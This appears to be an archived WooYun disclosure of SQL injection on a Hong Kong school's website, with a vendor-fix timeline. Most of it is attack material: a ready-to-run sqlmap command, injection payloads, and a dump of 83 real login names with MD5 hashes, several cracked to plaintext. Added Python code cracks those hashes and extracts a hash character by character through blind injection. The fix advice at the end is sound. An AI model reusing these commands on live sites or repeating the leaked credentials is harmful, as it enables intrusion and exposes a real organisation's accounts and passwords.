WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
2015-10-25: Details sent to the vendor, awaiting vendor handling
2015-10-28: Vendor confirmed the issue; details disclosed to the vendor only
2015-10-29: Vendor fixed the vulnerability and disclosed it proactively; details made public
SQL injection in a page of Diocesan Boys' School, Hong Kong (user login credentials can be dumped)
Test URL: http://**.**.**.**.hk/furtherstudies/index.php?parentid=5&sid=11
python sqlmap.py -u "http://**.**.**.**.hk/furtherstudies/index.php?parentid=5&sid=11" -p parentid --technique=BE --random-agent -D swims -T login -C login,passwd --dump --threads=10
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: parentid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: parentid=5 AND 4092=4092&sid=11

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: parentid=5 AND (SELECT 5676 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(5676=5676,1))),0x716b6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&sid=11
---
web server operating system: Linux SuSE 10.2
web application technology: Apache 2.2.3, PHP 5.2.5
back-end DBMS: MySQL 5.0

current user: 'swims_view@localhost'
current user is DBA: False
database management system users [1]:
[*] 'swims_view'@'localhost'

available databases [2]:
[*] information_schema
[*] swims

Database: swims
[5 tables]
+-----------+
| section   |
| content   |
| log       |
| login     |
| templates |
+-----------+

Database: swims
Table: login
[9 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| session    | varchar(32) |
| ip         | varchar(15) |
| lastip     | varchar(15) |
| laststatus | int(1)      |
| lasttime   | int(11)     |
| login      | varchar(32) |
| passwd     | varchar(32) |
| slevel     | int(1)      |
| type       | int(1)      |
+------------+-------------+

Database: swims
Table: login
[83 entries]
+-------------------+----------------------------------------------+
| login             | passwd                                       |
+-------------------+----------------------------------------------+
| 10km              | 9aa2eb58d61546c12062cd3f9456a5d1             |
| aa                | d8578edf8458ce06fbc5bb76a58c5ca4 (qwerty)    |
| admissionnewsclip | 8118c2d628b8366ae3f24a6bcac8c16f             |
| art               | 002d25e087bb1a7f1dc252ff5e48f005             |
| astronomy         | c3f8326e6f0cc970cc71e61358e19a81             |
| av                | 1449a8ddaf572b9301467467e6b6339e             |
| aviation          | 15cc4b82249c7b030de7ea16a3216a1e             |
| boarding          | 2bb53bb81d373a2b4f072e01e655085f             |
| bridge            | 8d2f6b5e556ad014146a93a1d8b9ab23             |
| bs                | 4e333762c9f4a75e6bf8958ea06411aa             |
| bsd               | 192de2b21c647bf17b7f5abb7d5383f7             |
| cdrama            | cdc9ae8277415733ad81ddc6a07981c2             |
| cf                | 5ce73527feaadc85e2476af0ecc4328d (jesus!)    |
| chem              | f08f90ffbf587b05e26f17616aea73ee             |
| chess             | 46e44aa0bc21d8a826d79344df38be4b (123qweASD) |
| chihist           | 21ef6578156b72a3437d9a0a12bd6586             |
| chinese           | f679585e513e53560c45c3eb3d8f0f1a             |
| chist             | a356eab069e616150d8e6ecb916b54b8             |
| christian_fellow  | 5ce73527feaadc85e2476af0ecc4328d (jesus!)    |
| civic             | c89ea82733108fc18e313df856c06c69             |
| clit              | 53b69cccf5cb56ddf840a87777454367             |
| cs                | 94b6c955e00906fb624054440a30b316             |
| dbsfoundation     | 8dbe46fcc067742bd8b714054d1f9d50             |
| dbspta            | 95de7d8c91d5e8bfb8d44acc00b6a6b0             |
| discipline        | 83d270632c591d1a2d03bd46389c469b             |
| dse               | b4c05802f985c1afabc09bb798241d40             |
| dt                | cf4cdc9a5e4d358dd07ba2b8393a2488             |
| ecs               | 473db90092021f87fa0a63f9ef425c1b             |
| english           | e13640f4976a0907fc7c1d234ff6494d             |
| englit            | 1ac1d1b636cc832803ed530293385daf             |
| es                | 30170728ebb8b4d60c2c9b812ac1b8dc             |
| film              | 464abfcded00e155ad5889d869db374e             |
| fitness           | 7f2b344bd50be2eb0f1b42626bd09834             |
| french            | d9cc313b5aa1f565080147bc2ca8499a             |
| frenchclub        | 22f50be93526facc4ca1fc278ee1c179 (123666)    |
| furtherstudies    | c352c4e5fad78f8a6c46a5a3d57861f2             |
| geog              | 2724f752f24063e574c81c348a8d1796             |
| german            | d1449c30287f1c2bb4b3ec73d295c970             |
| gifted            | d50421f925321162959c0d316dbcd869             |
| golf              | 9adf5339387a8d22144f446a92825639             |
| hist              | 60b80a112b377d52354a876528866b10             |
| history           | 41fc5fb9a61826dfb8e15f1282e87683             |
| ib                | 089cc6d2ee24461120321e10b5726b86             |
| ib2               | 0b64ae66d9cb7d486112d8ae4401b299             |
| interschoolsports | 8c5d801f845c0b895e57daf839f8bafa             |
| itwg              | e6636644175f9929297189ab8cc07bbf             |
| japan             | 51f6f8fe03a390d3de50ad49913d4b66 (123459)    |
| liberal           | ede4c8eecb58a906d62f4b34570213b9             |
| mac               | ae1984395283212c7e80f957c33e0f2b             |
| magic             | 58d9fc4c07b9d40af63d927cfbc14e28             |
| martial           | b69590c12f099d6cc07886f338d05620             |
| maths             | 5ae3295dd469f90a9f10c8f1a6958459             |
| mgeog             | 12f3c96e3c90308dd19e2905aeee15e9             |
| mmusic            | 18ff6fa7f4eca64df1b3ffc80ee42518             |
| music             | 1a4d4ac1a856d940d06f8acf221cea64             |
| nss               | 8cd211b9d2d45c858d258bbaac786a21             |
| ocean             | 5c8e51474d56c3c9a8d66f5c322f837b             |
| oi                | 4f4800afe4fc855934925fe9fc34a540             |
| orient            | 912bd9472e011e911020fe6cc0e5d4fd             |
| parents           | db34ea86820b356e164ee3c2177a2f30             |
| pe                | 5a8dd3ad0756a93ded72b823b19dd877 (hello!)    |
| phil              | bad2d158a6b400f2e239b148c52f50ed             |
| phototeam         | b7ed6efbb82513e00d32677557c92367             |
| psych             | 3c4b15a545de56b7625e8a615ee56280             |
| puto              | 440f81760c3f988302f8aad3956458de             |
| puzzle            | 016b51b6479c0a46c8e9f293ac930a79             |
| quintak           | ef58bcce3670da846d4c9c5de9f715ec             |
| sc                | 0875daa9eebf3080701ec100e3b6052f             |
| science           | 8b0dc2e34844337434b8475108a490ab (hohoho)    |
| skygarden         | f35b2e980682264dc65a1eb332cfddee             |
| smath             | a83862769f78fffb512bc9283007ef67 (maxmax)    |
| social            | 1b7037d2fece1fb637abe26d058f4a8a (social123) |
| socialsoc         | 9f9fb8fa8c9308d1a84db37317c34acf             |
| sports            | 5a8dd3ad0756a93ded72b823b19dd877 (hello!)    |
| sportsfed         | ede476f066abde060a857477d38ef47e             |
| stamp             | c1c824cfd0c5499563b055525035c137 (marcopolo) |
| swim              | f6ead7bf3faa8ad4be6310874328ad80             |
| swimming          | 862cdea78c758ed6d664cc6af403b4a9             |
| tennis            | 7daacea5f373b4c1c054158b126d317f (dennis)    |
| test              | 05a671c66aefea124cc08b76ea6d30bb (testtest)  |
| testsite          | 16d7a4fca7442dda3ad93c9a726597e4 (test1234)  |
| varts             | 079dec77a9ae897a8dcc0d9f1a6c9cdf             |
| waterpolo         | 397315245557848ce2a4207139d81827             |
+-------------------+----------------------------------------------+
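The passwd values in the dump are 32 hex characters and sqlmap's dictionary attack recovered several of them in plain text, which is what unsalted MD5 looks like. The following is an added example (mine, not part of the original report or the school's code) that checks this against a handful of rows copied from the table above, using a small constructed wordlist, and also flags accounts whose hashes are identical, something that can only happen when no per-user salt is in use. The wordlist is an assumption; the hashes are the page's own.

```python
import hashlib
from collections import defaultdict

# Rows copied from the dump above (login -> passwd); the full table has 83.
DUMPED_ROWS = {
    "10km": "9aa2eb58d61546c12062cd3f9456a5d1",
    "aa": "d8578edf8458ce06fbc5bb76a58c5ca4",
    "cf": "5ce73527feaadc85e2476af0ecc4328d",
    "christian_fellow": "5ce73527feaadc85e2476af0ecc4328d",
    "pe": "5a8dd3ad0756a93ded72b823b19dd877",
    "sports": "5a8dd3ad0756a93ded72b823b19dd877",
    "test": "05a671c66aefea124cc08b76ea6d30bb",
    "testsite": "16d7a4fca7442dda3ad93c9a726597e4",
}

# Constructed toy wordlist (assumption); sqlmap ships a far larger one for the same job.
WORDLIST = ["password", "123456", "qwerty", "hello!", "jesus!", "testtest", "test1234"]


def looks_like_unsalted_md5(digest):
    """32 lowercase hex characters, no scheme prefix and no salt separator."""
    return len(digest) == 32 and all(c in "0123456789abcdef" for c in digest)


def crack_unsalted_md5(rows, wordlist):
    """Dictionary attack: hash each candidate word once, then look every row up.

    This only works because nothing is salted: a guess hashes to the same value
    for every account, so the whole table costs len(wordlist) MD5 calls.
    """
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: table[h] for user, h in rows.items() if h in table}


def accounts_sharing_a_hash(rows):
    """Identical hashes mean identical passwords; per-user salts would hide this."""
    users_by_hash = defaultdict(set)
    for user, h in rows.items():
        users_by_hash[h].add(user)
    return {h: users for h, users in users_by_hash.items() if len(users) > 1}


if __name__ == "__main__":
    print(crack_unsalted_md5(DUMPED_ROWS, WORDLIST))
    print(accounts_sharing_a_hash(DUMPED_ROWS))
```

With the toy wordlist the two test accounts and aa fall immediately; 10km survives only because its plaintext is not in the list, not because the hash is any stronger.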
Fix suggestion: add input filtering. parentid and sid are numeric IDs, so cast them to integers (or reject any value that is not all digits) before they reach the query, and bind them with prepared statements instead of concatenating them into the SQL string. Because the login table holds 32-character unsalted MD5 hashes, several of which sqlmap recovered by dictionary attack, the stored passwords should be reset and rehashed with a salted, slow password hash.
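To make the mechanics of the finding concrete, here is an added example (mine, not code from the page or from the school's site) that rebuilds the vulnerable query pattern behind index.php?parentid=5&sid=11 against an in-memory SQLite database with constructed sample rows. The table and column names (section, login, passwd) are taken from the dump; the schema and the PHP source are assumptions. It shows the boolean-based blind differential sqlmap used (5 AND 4092=4092 versus a false condition), uses that differential to recover a passwd hash one hex digit at a time, and then the filtered, parameterized version the fix suggestion calls for. The MySQL-specific error-based payload is not reproduced, since SQLite has no equivalent of the FLOOR(RAND(0)*2) duplicate-key error.

```python
import re
import sqlite3

HEX_DIGITS = "0123456789abcdef"

# Constructed sample rows; only the table and column names come from the dump.
SECTION_ROWS = [
    (11, 5, "university entrance"),
    (12, 5, "scholarships"),
    (13, 6, "unrelated section"),
]
LOGIN_ROWS = [
    ("aa", "d8578edf8458ce06fbc5bb76a58c5ca4"),
    ("test", "05a671c66aefea124cc08b76ea6d30bb"),
]


def make_db():
    """In-memory stand-in for the swims database (schema assumed)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE section (sid INTEGER, parentid INTEGER, title TEXT)")
    con.execute("CREATE TABLE login (login TEXT, passwd TEXT)")
    con.executemany("INSERT INTO section VALUES (?, ?, ?)", SECTION_ROWS)
    con.executemany("INSERT INTO login VALUES (?, ?)", LOGIN_ROWS)
    return con


def vulnerable_lookup(parentid, sid, con=None):
    """The injectable pattern: GET values concatenated straight into the SQL.

    A true condition appended to parentid returns the normal rows, a false
    one returns nothing; that visible difference is all blind injection needs.
    """
    if con is None:
        con = make_db()
    sql = "SELECT title FROM section WHERE parentid=%s AND sid=%s" % (parentid, sid)
    return [row[0] for row in con.execute(sql)]


def blind_extract_passwd(user, length=32, con=None):
    """Recover login.passwd for `user` via the boolean oracle, one hex digit per position."""
    if con is None:
        con = make_db()
    recovered = ""
    for pos in range(1, length + 1):
        for digit in HEX_DIGITS:
            probe = ("5 AND (SELECT substr(passwd,%d,1) FROM login WHERE login='%s')='%s'"
                     % (pos, user, digit))
            if vulnerable_lookup(probe, "11", con):
                recovered += digit
                break
        else:
            raise RuntimeError("no hex digit matched at position %d" % pos)
    return recovered


def hardened_lookup(parentid, sid, con=None):
    """The fix: accept only all-digit ids, then bind them as query parameters."""
    if not (re.fullmatch(r"[0-9]+", parentid) and re.fullmatch(r"[0-9]+", sid)):
        raise ValueError("parentid and sid must be integers")
    if con is None:
        con = make_db()
    rows = con.execute(
        "SELECT title FROM section WHERE parentid=? AND sid=?",
        (int(parentid), int(sid)),
    )
    return [row[0] for row in rows]


def hardened_rejects(parentid, sid="11"):
    """True when the hardened handler refuses the value instead of querying with it."""
    try:
        hardened_lookup(parentid, sid)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(vulnerable_lookup("5 AND 4092=4092", "11"))  # same rows as parentid=5
    print(vulnerable_lookup("5 AND 4092=4093", "11"))  # nothing: the oracle's "false"
    print(blind_extract_passwd("aa"))                  # the hash, 16 guesses per digit at most
    print(hardened_rejects("5 AND 4092=4092"))         # True
```

The extraction loop is the whole reason a "boolean-based blind" finding on a read-only view user is still rated high: 32 hex positions times at most 16 guesses is a few hundred requests per hash, and sqlmap parallelises that with --threads. Either half of the hardened version on its own would have stopped it; the integer check rejects the payload before any query runs, and the bound parameter would have compared parentid against the literal string even if the check were missing.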
Severity: High
Vulnerability rank: 12
Confirmed: 2015-10-28 12:00
The incident has been reported to the organisation concerned.
2015-10-29: The organisation concerned reported that the vulnerability has been fixed.